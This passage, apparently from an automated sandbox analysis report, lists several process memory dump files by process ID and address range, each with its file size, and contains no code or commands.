                                                                                                                                                    Filesize

                                                                                                                                                    408KB

                                                                                                                                                  • memory/2528-168-0x0000000005470000-0x000000000548E000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    120KB

                                                                                                                                                  • memory/4340-218-0x00007FFBA8E90000-0x00007FFBA9951000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/4340-221-0x00007FFBA8E90000-0x00007FFBA9951000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/4972-159-0x0000000010000000-0x0000000010D78000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    13.5MB